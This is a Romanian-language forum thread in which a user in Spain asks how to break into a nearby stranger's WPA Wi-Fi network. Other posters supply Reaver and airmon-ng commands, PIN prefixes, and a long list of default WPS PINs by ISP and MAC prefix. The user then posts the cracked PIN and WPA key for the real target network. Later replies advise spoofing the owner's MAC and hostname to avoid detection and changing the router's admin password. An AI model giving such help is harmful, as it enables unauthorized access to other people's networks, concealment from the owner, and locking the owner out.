ionutz15 Posted October 31, 2012 Report Posted October 31, 2012 Da?i-mi câteva ideii de cum pot afla parola WPA la aceasta re?ea...Dupa cum vedeti, semnal 100%, cred ca e fix langa mine Precizez ca sunt in spania. Quote
sorelian Posted November 1, 2012 Report Posted November 1, 2012 Dupa cate stiu eu de la prietenii mei spanioli ,retelele astea wlan_xxxx au parola "por defecto" ,care se gaseste cu ajutorulunor keygeneratoare , dupa MAC. Problema e ca nu sunt generatoare chiar pentru toate tipurile de wlan.Incearca , totusi , Nuevo Swifi Keygen: 1.0.0.1 , nu e nimic sigur.... Quote
ionutz15 Posted November 1, 2012 Author Report Posted November 1, 2012 (edited) Dupa cate stiu eu de la prietenii mei spanioli ,retelele astea wlan_xxxx au parola "por defecto" ,care se gaseste cu ajutorulunor keygeneratoare , dupa MAC. Problema e ca nu sunt generatoare chiar pentru toate tipurile de wlan.Incearca , totusi , Nuevo Swifi Keygen: 1.0.0.1 , nu e nimic sigur....Stiam de chestia asta cu parola "por defecto", dar se pare ca nu este aceea ce mi-o genereaza...Daca a schimbato trebuia sa fie WPA2? Edited November 1, 2012 by ionutz15 Quote
sorelian Posted November 1, 2012 Report Posted November 1, 2012 Pai, daca a schimbato , e tot wpa/wpa2 ,doar ca nu mai e parola default....In cazul asta , cu handshake , varianta clasica cu dictionarul e pierdere de vreme.Ar trebui sa ai un dictionar adecvat...Mai ramane varianta cu reaver ....daca are wps activat.Totusi, mai cauta generatoare de key pentru wlan_ , pentru ca ,in Spania, 99% dintre utilizatorii de wireless , nu schimbaparola by default...doar 1% sunt avizati si se securizeaza strong. Quote
hirosima Posted November 1, 2012 Report Posted November 1, 2012 Pai, daca a schimbato , e tot wpa/wpa2 ,doar ca nu mai e parola default....In cazul asta , cu handshake , varianta clasica cu dictionarul e pierdere de vreme.Ar trebui sa ai un dictionar adecvat...Mai ramane varianta cu reaver ....daca are wps activat.Totusi, mai cauta generatoare de key pentru wlan_ , pentru ca ,in Spania, 99% dintre utilizatorii de wireless , nu schimbaparola by default...doar 1% sunt avizati si se securizeaza strong.eu foloseam back track si in cateva secunde iti oferea parola, mai ales daca este default. Poti incerca nu ai nimic de pierdut! Quote
ionutz15 Posted November 1, 2012 Author Report Posted November 1, 2012 eu foloseam back track si in cateva secunde iti oferea parola, mai ales daca este default. Poti incerca nu ai nimic de pierdut!Un tutorial, un nume de program, ceva?Ms! Quote
mrjasdf Posted November 1, 2012 Report Posted November 1, 2012 Cum zicea si tovarashu sorelian " Mai ramane varianta cu reaver ....daca are wps activat. " Quote
black_death_c4t Posted November 1, 2012 Report Posted November 1, 2012 Un tutorial, un nume de program, ceva?Ms!http://www.backtrack-linux.org/downloads/https://www.youtube.com/watch?v=EOJB3heWnyIg0tmi1k: [script] wiffy (v0.1) Quote
Crocodilu´ Posted November 1, 2012 Report Posted November 1, 2012 ai incercat cu multipatron din wifiway?daca nu, incearca...poate ai bulan Quote
darknwo Posted November 1, 2012 Report Posted November 1, 2012 (edited) Nu mai incerca cu niciun program inafara de reaver ca nu ai sa rezolvi nimic.Pentru acel MAC ce il are reteaua aia nu se poate genera parola din fabrica pentru ca nu au descoperit algoritmul.Foloseste reaver pentru a afla PIN-ul (DE 8 CIFRE) de la WPS si dupa iti da parola WPA/WPA2.Daca te ajuta ceva pentru acel mac PIN-ul poate incepe cu 4315 sau 9901, deci ar trebui sa faci cam asa dupa ce ai instalat aircrack + reaver.1. sudo airmon-ng start wlan02. sudo reaver -i mon0 -b 5C:33:8E:XX:XX:XX -vv -p 4315 SAU sudo reaver -i mon0 -b 5C:33:8E:XX:XX:XX -vv -p 9901Le incerci pe rand si vezi cu care iti iese.PS: Ai nevoie de mai multe chestii pentru ca reaver sa functioneze, cauta pe Google tutoriale ca sa nu mai scriu eu aici.PS2: Vezi ca dureaza ceva "procesul" cu reaver.PS3: Inlocuiesti in loc de 5C:33:8E........ bineinteles cu MAC-ul acelei retele. Edited November 1, 2012 by darknwo Quote
hirosima Posted November 2, 2012 Report Posted November 2, 2012 mai bine descarci ultima versiune de back track si are integrat reaver. Arzi iso pe un DVD il rulezi si folosesti comezile pe care ti le-a spus darknwo. Problema este ca chipsetul placi wifi sa iti suporte mode monitor, iar acel driver sa fie inclus in back track.Mult succes!http://www.backtrack-linux.org/downloads/ Quote
Graphik Posted November 2, 2012 Report Posted November 2, 2012 Pentru cr?c?nat re?ele f?r? fir mai merge ?i beini Beini - Download tutoriale se gasesc pe youtube Quote
NOVATu Posted November 6, 2012 Report Posted November 6, 2012 Aici ai lista cu vulnerabilitati routere,adica care routere sunt vulnerabile plus timpul plus patronul daca se cunoaste:https://docs.google.com/spreadsheet/ccc?key=0Ags-JmeLMFP2dFp2dkhJZGIxTTFkdFpEUDNSSHZEN3c#gid=0Si aici lista cu patronii care se cunosc in spania:WLAN TIMOFÓNICAS :ESSID: WLAN_XXXXBSSID: 00:19:15:XX:XX:XXMODELO: AW4062V. Firm: –Wps Activado: SiPIN: 12345670——-WLAN_XXXXMAC:30:39:F2Wps activado:siPin:1653XXXX——-ESSID: WLAN_XXXXBSSID: 00:19:15:XX:XX:XXMODELO:Tecom Co.LtdV. Firm: –Wps Activado: SiPIN: 12345670——–WLAN_XXXXBSSID: DC:0B:1APin: 1653fabricante:ADB Broadband SpA——bssid: 30:39:F2:7x:xx:xxessid: WLAN_AAxxPIN WPS: 1670xxxxWPA: TCmMSxxxxxxxxxxxxxxx——–ESSID: WLAN_XXXXBSSID: 30:39:F2:XX:XX:XXMODELO: BroadcomV. Firm: –Wps Activado: SiInicio PIN: 4329xxxx——ESSID: WLAN_XXXXBSSID: 40:4A:03:XX:XX:XXMODELO: ZYXELL P-870HW-51A V2V. Firm: –Wps Activado: SiPIN: 11866428——ESSID: WLAN_XXXXBSSID: 30:39:F2:XX:XX:XXMODELO: –V. Firm: –Wps Activado: SiInicio PIN: 1670@@@@ // 4329@@@@ // 16538061——ESSID: WLAN_XXXXBSSID: F4:3E:61:XX:XX:XXMODELO: –V. Firm: –Wps Activado: SiPIN: 12345670——ESSID: WLAN_XXXXBSSID: 00:1A:2B:XX:XX:XXMODELO: Comtrend Gigabit 802.11nV. Firm: –Wps Activado: SiPIN: 8847@@@@——WLAN_XXXX40:4A:03WPS defecto: NoPIN – 1186xxxx——WLAN_XXXX30:39:F21670xxxxwps defecto: si—–WLAN_XXXX (Las XXXX son 4 números y todos menos el último coinciden con los 4 últimos parámetros de la MAC que cambia un 9 por una A )Router: ZYXELL P-870HW-51A V2MAC: 40:4A:03:XX:XX:XXPin activado por defecto: 1186XXXXContraseña 20 dígitos letras mayúsculas y números mezcladosEncriptación: WPA2-PSK AES—–WLAN_XXXXMAC: 30:39:F2Wps Activado: SiPIN: 1653XXXX——————————————————————————–JAZZmusicTELESSID: JAZZTEL_XXXXBSSID: 00:38:72:XX:XX:XXMODELO: AR-3025unV. Firm: –Wps Activado: SiInicio PIN: 1562@@@@——-ESSID: JAZZTEL_XXXXBSSID: 00:38:72:XX:XX:XXMODELO: AR-5387unV. Firm: –Wps Activado: SiInicio PIN: 1883@@@@——ESSID: JAZZTEL_XXXXBSSID: 00:38:72:XX:XX:XXMODELO: AR-5387unV. Firm: –Wps Activado: NoPIN: 18836486——ESSID: JAZZTEL_XXXXBSSID: 64:68:0C:XX:XX:XXMODELO: AR-5381uV. Firm: –Wps Activado: NoInicio PIN: 1562@@@@————————————————————————————–FTsExESSID: FTE-XXXXBSSID: 84:A8:E4:XX:XX:XXMODELO: –V. Firm: –Wps Activado: SiInicio PIN: 7996@@@@——ESSID: FTE-XXXXBSSID: 04:C0:6F:XX:XX:XXMODELO: –V. Firm: –Wps Activado: SiInicio PIN: 0751@@@@——ESSID: FTE_XXXXBSSID: 20:2B:C1:XX:XX:XXMODELO: Huawei HG532CV. Firm: –Wps Activado: SiInicio PIN: 1957@@@@—–FTE-XXXXMAC: 84:A8:E4Wps Activado: SiPIN: 7996XXXX—–ESSID: FTE_XXXXBSSID: 20:2B:C1:XX:XX:XXMODELO: Huawei HG532CV. Firm: –Wps Activado: SiInicio PIN: 1957xxxx—–FTE-XXXXMAC: 04:C0:6FWps Activado: SiPIN: 0751XXXX——————————————————————————–COnoESSID: ONO_XXXX (letras y numeros)BSSID: A0:21:B7:XX:XX:XXPin: 6557WPA clave: 16557XXXXX (10 numeros)——–M.A.C.: A0:21:B7:xx:xx:xxPIN WPS: 0634xxxxWPA: 634xxxxxxxM. Router: Netgear——–ESSID: ONOXX97BSSID: 74:44:01:XX:XX:97MODELO: CG3100DV. Firm: –Wps Activado: SíPIN: 3555@@@@——ESSID: ONOXX19BSSID: C0:3F:0E:XX:XX: 19MODELO: CG3100DV. Firm: –Wps Activado: SíPIN: 8345@@@@——ESSID: ONOXXXXBSSID: C4:3D:C7:XX:XX:XXMODELO: –V. Firm: –Wps Activado: NoPIN: 5141@@@@——MAC-C4:3D:C7xxxxxxONOxxxxPIN-5141xxxxWPS Activado-NO———–ONOXXXXWPS PIN-9522xxxxWPA-PSK 195221xxxxMAC-30:46:9AxxxxxxWPS Activado- NO—–WPS PIN: 1504XXXXWPA PSK: 9150XXXXXXAP SSID: ONOXXXXMAC: 30:46:9A:XX:XX:XX——WPS PIN-2503WPA PSK-520AP SSID-ONO35AEMAC-CO:3F.0E——————————————————————————–OpangeESSID: Orange-XXXXBSSID: 5C:33:8E:XX:XX:XMODELO: –V. Firm: –Wps Activado: SíPIN: 1111@@@@——orange-c6 8)ap mac-5c:33:8E:xx:xx:xxwps locked-sipin-1111xxxx——-orange-xxxxmac-5c:33:8e:xx:XX:xxwps locked-si——————————————————————————–WIIESSID: WIFIXXXXXXBSSID: 88:25:2C:XX:XX:XMODELO: –V. Firm: –Wps Activado: SíPIN: 7654@@@@——LINKmac-F4:EC:38xxxxxxPT-linkPIN -1452xxxxWPS Activado -si————————–MAC-F8:D1:11xxxxxxPT-LINKPIN-4867xxxxWPS Activado -si———————-MAC-00:18:E7xxxxxxD-LINKPIN-1553xxxxWPS Activado -si————-MAC-B0:48:7AxxxxxxKTMPIN-0055xxxx————Marca/modelo: D-Link DIR-600MAC: 1C:7E:E5:XX:XX:XXPIN por defecto: 6041XXXX Quote
ionutz15 Posted November 7, 2012 Author Report Posted November 7, 2012 Pai din pacate al meu nu se afla in aceea lista :SAm incercat cum a spus @darknwo dar fara succes.Mac-ul retelei: 5C:33:8E:A2:XX:XX Quote
bruttus139 Posted November 9, 2012 Report Posted November 9, 2012 wifiway 3.4 (spaniol) + modul Reaver 1.3 + Inflator dupa care stai si vezi un meci ceva,sau te culci,si in citeva ore iti da pinul si parola.Asta este unica solutie viabila pentru orice parola wifi diferita de wep,daca routerul are WPS activat. Quote
darknwo Posted November 9, 2012 Report Posted November 9, 2012 @ionutz - depinde foarte mult si cat de puternic este semnalul, daca reaver suporta placa ta wireless. Trebuie sa detaliezi mai mult, cu "nu merge" nu e deajuns. Spune ce eroare a dat, sau ce nu a mers. Procesul poate dura in jur de 10 ore. dar cum deja ti-am dat jumatate din PIN ar trebui sa dureze mai putin. Poti incerca si fara parametrul -p si sa o iei de la 0. Quote
ionutz15 Posted November 16, 2012 Author Report Posted November 16, 2012 @ionutz - depinde foarte mult si cat de puternic este semnalul, daca reaver suporta placa ta wireless. Trebuie sa detaliezi mai mult, cu "nu merge" nu e deajuns. Spune ce eroare a dat, sau ce nu a mers. Procesul poate dura in jur de 10 ore. dar cum deja ti-am dat jumatate din PIN ar trebui sa dureze mai putin. Poti incerca si fara parametrul -p si sa o iei de la 0.·Intensitate semnal: 93%·Da, reaver suporta placa wifi.·Mac complet al retelei: 5C:33:8E:A2:7C:ECPractic, l-am lasat 2 zile aprox. si nu a facut nimic...Am incercat si cu si fara parametrul -p...Ms frumos pt timpul acordat. Quote
sorelian Posted November 16, 2012 Report Posted November 16, 2012 ·Intensitate semnal: 93%·Da, reaver suporta placa wifi.·Mac complet al retelei: 5C:33:8E:A2:7C:ECPractic, l-am lasat 2 zile aprox. si nu a facut nimic...Nu inteleg ce inseamna ca nu a facut nimic reaver...o astfel de formulare are sens daca routerul nu are wps activat...si atunci vorbim degeaba despre atacul de tip reaver.Daca, totusi ,routerul are wps activat ,uite ce am gasit, intro baza de date din wpscrackgui 1.2.0 din wifislax 4.3 rc3 ,pentru MAC-ul tau. Sunt variante de pin posibile... Quote
ionutz15 Posted November 16, 2012 Author Report Posted November 16, 2012 (edited) Nu inteleg ce inseamna ca nu a facut nimic reaver...o astfel de formulare are sens daca routerul nu are wps activat...si atunci vorbim degeaba despre atacul de tip reaver.Daca, totusi ,routerul are wps activat ,uite ce am gasit, intro baza de date din wpscrackgui 1.2.0 din wifislax 4.3 rc3 ,pentru MAC-ul tau. Sunt variante de pin posibile...Sa probez...Revin cu un edit.L.E[+] Waiting for beacon from 5C:33:8E:A2:7C:EC[+] Switching mon0 to channel 5[+] Associated with 5C:33:8E:A2:7C:EC (ESSID: WLAN_7CEC)[+] Trying pin 82848439[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message[+] Received WSC NACK[+] Sending WSC NACK[+] Trying pin 82848439[+] Sending EAPOL START request[!] WARNING: Receive timeout occurred[+] Sending EAPOL START request[+] Sending WSC NACK[!] WPS transaction failed (code: 0x03), re-trying last pin[+] Trying pin 82848439[!] WPS transaction failed (code: 0x03), re-trying last pin[+] Trying pin 11765592[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message[+] Received WSC NACK[+] Sending WSC NACK[+] Trying pin 11765592[+] Sending EAPOL START request[!] WARNING: Receive timeout occurred[+] Sending EAPOL START requestDeocamdata am incercat cu astea doua...Acum incerc cu cele XXXX. Edited November 16, 2012 by ionutz15 Quote
bruttus139 Posted November 16, 2012 Report Posted November 16, 2012 Routerul ala este protejat la atacuri pe pin,si la fiecare 10 incercari ia pauza,asa ca dureaza sa scoti parola de la el.Daca nu ai raspuns de pina la 10 secunde pe fiecare pin este posibil sa nu reusesti sau sa astepti citeva zile pina afla parola. Descarca wifislax,si foloseste baza de date de la wpscrakgui ca vad ca are si pinul tau(sau parte din el) si asa nu mai pierzi timp. Quote
ionutz15 Posted November 17, 2012 Author Report Posted November 17, 2012 Routerul ala este protejat la atacuri pe pin,si la fiecare 10 incercari ia pauza,asa ca dureaza sa scoti parola de la el.Daca nu ai raspuns de pina la 10 secunde pe fiecare pin este posibil sa nu reusesti sau sa astepti citeva zile pina afla parola. Descarca wifislax,si foloseste baza de date de la wpscrakgui ca vad ca are si pinul tau(sau parte din el) si asa nu mai pierzi timp.Dece nu ma lasa sa dau Buscar? Quote
sorelian Posted November 17, 2012 Report Posted November 17, 2012 Pentru ca esti intro varianta mai veche de wpscrackgui...Descarca acest modul , il pui in fisierul modules din wifislax si incearca din nou.Daca ceva nu e in regula, descarca ultima varianta de wifislax 4.3 rc3 , ca o are implicita. Quote
ionutz15 Posted November 18, 2012 Author Report Posted November 18, 2012 (edited) Am reusit![+] WPS PIN: '38944420'[+] WPA PSK: 'H50MXYIY0FA8DBC0NXXX'[+] AP SSID: 'WLAN_7CEC'[+] MAC: 5C:33:8E:A2:7C:ECL.E: Am accesat router-ul si am observat:Este vreo un mod sa fac sa dispara ca nu sunt conectat?Si aici la fel:DHCP CLIENTS LISTHost Name IP Address MAC Address | 192.168.1.37 | 00:12:34:86:XX:XXaNoNyN-PC | 192.168.1.38 | 48:02:2A:XX:XX:XXCel in bold este al meu...cum fac sa dispara? :S Edited November 18, 2012 by ionutz15 Quote
bruttus139 Posted November 18, 2012 Report Posted November 18, 2012 Nu poti sa faci sa dispara,chiar si daca stergi logul tot ramine urma.Eventual poti schimba numele calculatorului,MAC-ul,si sa le pui pe cele ale proprietarului,asa nu stie pe cine sa caute in caz de ceva,dar cind se va conecta si el,va da eroare IP si MAC si atunci isi va da seama (cel putin nu va sti cine a mai intrat) Quote
yo20063 Posted December 28, 2012 Report Posted December 28, 2012 Pune-i parola (s-au schimba default) pe interfata de administrare a routerului....poate e noob si nu da reset manual la router, sau nici nu o sa se chinuie, atata timp cat ii merge internetul Quote